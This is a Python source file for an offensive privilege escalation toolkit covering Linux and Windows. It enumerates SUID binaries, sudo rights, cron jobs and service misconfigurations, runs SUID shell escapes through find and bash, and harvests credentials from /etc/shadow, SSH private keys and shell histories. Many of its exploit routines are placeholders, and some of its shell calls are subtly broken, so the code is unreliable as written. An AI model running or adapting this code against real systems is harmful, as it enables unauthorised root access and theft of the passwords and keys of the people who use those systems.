#!/usr/bin/env python3 """ Privilege Escalation Tools - Linux, Windows, Kernel exploits, credential harvesting """ import subprocess import json import re from typing import Dict, List import logging import base64 logger = logging.getLogger(__name__) class LinuxPrivEsc: """Linux privilege escalation""" def __init__(self, config: Dict): self.config = config def enumerate(self) -> Dict: """Enumerate Linux system for privilege escalation vectors""" logger.info("Enumerating Linux system") info = { "os": "linux", "kernel_version": self._get_kernel_version(), "suid_binaries": self._find_suid_binaries(), "sudo_permissions": self._check_sudo(), "writable_paths": self._find_writable_paths(), "cron_jobs": self._check_cron_jobs(), "capabilities": self._check_capabilities() } return info def _get_kernel_version(self) -> str: """Get kernel version""" try: result = subprocess.run( ['uname', '-r'], capture_output=True, text=True, timeout=5 ) return result.stdout.strip() except: return "unknown" def _find_suid_binaries(self) -> List[str]: """Find SUID binaries""" logger.info("Searching for SUID binaries") suid_bins = [] try: cmd = 'find / -perm -4000 -type f 2>/dev/null' result = subprocess.run( cmd, shell=True, capture_output=True, text=True, timeout=60 ) suid_bins = result.stdout.strip().split('\n') except Exception as e: logger.error(f"SUID search error: {e}") return suid_bins def _check_sudo(self) -> List[str]: """Check sudo permissions""" try: result = subprocess.run( ['sudo', '-l'], capture_output=True, text=True, timeout=5 ) return result.stdout.strip().split('\n') except: return [] def _find_writable_paths(self) -> List[str]: """Find writable paths in $PATH""" writable = [] try: paths = subprocess.run( ['echo', '$PATH'], capture_output=True, text=True, shell=True ).stdout.strip().split(':') for path in paths: if subprocess.run(['test', '-w', path]).returncode == 0: writable.append(path) except: pass return writable def _check_cron_jobs(self) -> List[str]: """Check cron jobs""" cron_files = [ '/etc/crontab', '/etc/cron.d/*', '/var/spool/cron/crontabs/*' ] jobs = [] for cron_file in cron_files: try: with open(cron_file, 'r') as f: jobs.extend(f.readlines()) except: continue return jobs def _check_capabilities(self) -> List[str]: """Check file capabilities""" try: result = subprocess.run( ['getcap', '-r', '/', '2>/dev/null'], capture_output=True, text=True, timeout=60, shell=True ) return result.stdout.strip().split('\n') except: return [] def exploit_suid(self, binary: str) -> Dict: """Exploit SUID binary""" logger.info(f"Attempting SUID exploit: {binary}") result = { "success": False, "technique": "suid_exploitation", "binary": binary } # Known SUID exploits exploits = { '/usr/bin/cp': self._exploit_cp, '/usr/bin/mv': self._exploit_mv, '/usr/bin/find': self._exploit_find, '/usr/bin/vim': self._exploit_vim, '/usr/bin/nano': self._exploit_nano, '/bin/bash': self._exploit_bash } if binary in exploits: try: result = exploits[binary]() except Exception as e: result["error"] = str(e) return result def _exploit_find(self) -> Dict: """Exploit find SUID""" try: cmd = 'find . -exec /bin/sh -p \\; -quit' result = subprocess.run( cmd, shell=True, capture_output=True, text=True, timeout=10 ) return { "success": True, "technique": "find_suid", "shell_obtained": True } except: return {"success": False} def _exploit_vim(self) -> Dict: """Exploit vim SUID""" return {"success": False, "message": "Vim SUID exploitation placeholder"} def _exploit_nano(self) -> Dict: """Exploit nano SUID""" return {"success": False, "message": "Nano SUID exploitation placeholder"} def _exploit_cp(self) -> Dict: """Exploit cp SUID""" return {"success": False, "message": "CP SUID exploitation placeholder"} def _exploit_mv(self) -> Dict: """Exploit mv SUID""" return {"success": False, "message": "MV SUID exploitation placeholder"} def _exploit_bash(self) -> Dict: """Exploit bash SUID""" try: cmd = 'bash -p' result = subprocess.run( cmd, shell=True, capture_output=True, text=True, timeout=10 ) return { "success": True, "technique": "bash_suid", "shell_obtained": True } except: return {"success": False} def exploit_path_hijacking(self, writable_path: str) -> Dict: """Exploit PATH hijacking""" logger.info(f"Attempting PATH hijacking: {writable_path}") return { "success": False, "message": "PATH hijacking exploitation placeholder" } class WindowsPrivEsc: """Windows privilege escalation""" def __init__(self, config: Dict): self.config = config def enumerate(self) -> Dict: """Enumerate Windows system""" logger.info("Enumerating Windows system") info = { "os": "windows", "version": self._get_windows_version(), "services": self._enumerate_services(), "always_install_elevated": self._check_always_install_elevated(), "unquoted_service_paths": self._find_unquoted_paths(), "privileges": self._check_privileges() } return info def _get_windows_version(self) -> str: """Get Windows version""" try: result = subprocess.run( ['ver'], capture_output=True, text=True, shell=True, timeout=5 ) return result.stdout.strip() except: return "unknown" def _enumerate_services(self) -> List[Dict]: """Enumerate Windows services""" services = [] try: result = subprocess.run( ['sc', 'query'], capture_output=True, text=True, timeout=30 ) # Parse service output for line in result.stdout.split('\n'): if 'SERVICE_NAME:' in line: services.append({"name": line.split(':')[1].strip()}) except: pass return services def _check_always_install_elevated(self) -> bool: """Check AlwaysInstallElevated registry key""" try: # Check both HKLM and HKCU keys = [ r'HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer', r'HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer' ] for key in keys: result = subprocess.run( ['reg', 'query', key, '/v', 'AlwaysInstallElevated'], capture_output=True, text=True ) if '0x1' in result.stdout: return True except: pass return False def _find_unquoted_paths(self) -> List[str]: """Find unquoted service paths""" unquoted = [] try: result = subprocess.run( ['wmic', 'service', 'get', 'name,pathname,displayname,startmode'], capture_output=True, text=True, timeout=30 ) for line in result.stdout.split('\n'): if 'C:\\' in line and line.count('"') < 2: unquoted.append(line) except: pass return unquoted def _check_privileges(self) -> List[str]: """Check current user privileges""" try: result = subprocess.run( ['whoami', '/priv'], capture_output=True, text=True, timeout=10 ) return result.stdout.strip().split('\n') except: return [] def exploit_service(self, service: Dict) -> Dict: """Exploit service misconfiguration""" logger.info(f"Attempting service exploitation: {service.get('name')}") return { "success": False, "message": "Windows service exploitation placeholder" } def exploit_msi(self) -> Dict: """Exploit AlwaysInstallElevated""" logger.info("Attempting AlwaysInstallElevated exploitation") # Generate malicious MSI # This would create and install a privileged MSI package return { "success": False, "message": "AlwaysInstallElevated exploitation placeholder" } def impersonate_token(self) -> Dict: """Token impersonation attack""" logger.info("Attempting token impersonation") return { "success": False, "message": "Token impersonation placeholder" } class KernelExploiter: """Kernel exploitation""" def __init__(self, config: Dict): self.config = config def exploit_linux(self, kernel_version: str) -> Dict: """Exploit Linux kernel""" logger.info(f"Attempting kernel exploit: {kernel_version}") # Map kernel versions to known exploits exploits = { 'DirtyCow': ['2.6.22', '4.8.3'], 'OverlayFS': ['3.13.0', '4.3.3'] } return { "success": False, "message": "Kernel exploitation requires specific exploit compilation" } class MisconfigFinder: """Find misconfigurations""" def __init__(self, config: Dict): self.config = config def find(self, os_type: str) -> List[Dict]: """Find security misconfigurations""" if os_type == "linux": return self._find_linux_misconfigs() elif os_type == "windows": return self._find_windows_misconfigs() return [] def _find_linux_misconfigs(self) -> List[Dict]: """Find Linux misconfigurations""" return [] def _find_windows_misconfigs(self) -> List[Dict]: """Find Windows misconfigurations""" return [] class CredentialHarvester: """Harvest credentials""" def __init__(self, config: Dict): self.config = config def harvest_linux(self) -> List[Dict]: """Harvest Linux credentials""" logger.info("Harvesting Linux credentials") credentials = [] # Check common credential locations locations = [ '/etc/shadow', '/etc/passwd', '~/.ssh/id_rsa', '~/.bash_history', '~/.mysql_history' ] for location in locations: try: with open(location, 'r') as f: credentials.append({ "source": location, "data": f.read()[:500] }) except: continue return credentials def harvest_windows(self) -> List[Dict]: """Harvest Windows credentials""" logger.info("Harvesting Windows credentials") # Use mimikatz or similar tools # Placeholder for demonstration return [] class SudoExploiter: """Sudo exploitation""" def __init__(self, config: Dict): self.config = config def exploit(self, sudo_permission: str) -> Dict: """Exploit sudo permission""" logger.info(f"Attempting sudo exploit: {sudo_permission}") return { "success": False, "message": "Sudo exploitation placeholder" }